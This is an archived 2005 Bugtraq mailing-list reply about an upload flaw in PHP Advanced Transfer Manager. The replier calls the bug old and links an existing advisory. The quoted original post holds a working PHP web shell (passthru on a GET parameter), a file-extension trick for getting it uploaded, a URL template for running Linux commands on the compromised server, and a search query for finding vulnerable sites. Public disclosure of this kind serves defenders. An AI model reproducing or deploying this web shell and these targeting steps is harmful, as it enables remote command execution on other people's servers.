lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <649238019.20051030062300@bk.ru>
Date: Sun, 30 Oct 2005 06:23:00 +0300
From: D_BuG <d_bug@...ru>
To: sQl@...mail.com, bugtraq@...urityfocus.com
Subject: Re: uplod phpshell in PHP Advanced Transfer Manager


Read link =)

http://www.securityfocus.com/bid/13542/exploit

This old bug ;)


Good luke discovered!

> <

> uplod phpshell in PHP Advanced Transfer Manager

> one save as the code :

> --------

> <pre>
> <?
> passthru($_GET['sQl']);
?>>

> --------

file >> save as > sQl.php.ns

> now upload in the  PHP Advanced Transfer Manager

> end the upload go to >

> www.site.com/[file upload name]/[files]/sQl.php.ns?sQl=[command linux]

> search google :

> PHP Advanced Transfer Manager

> }

> by sQl

> sQl[at]homail.[com]

> {

>>


-- 
С уважением, Денис.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ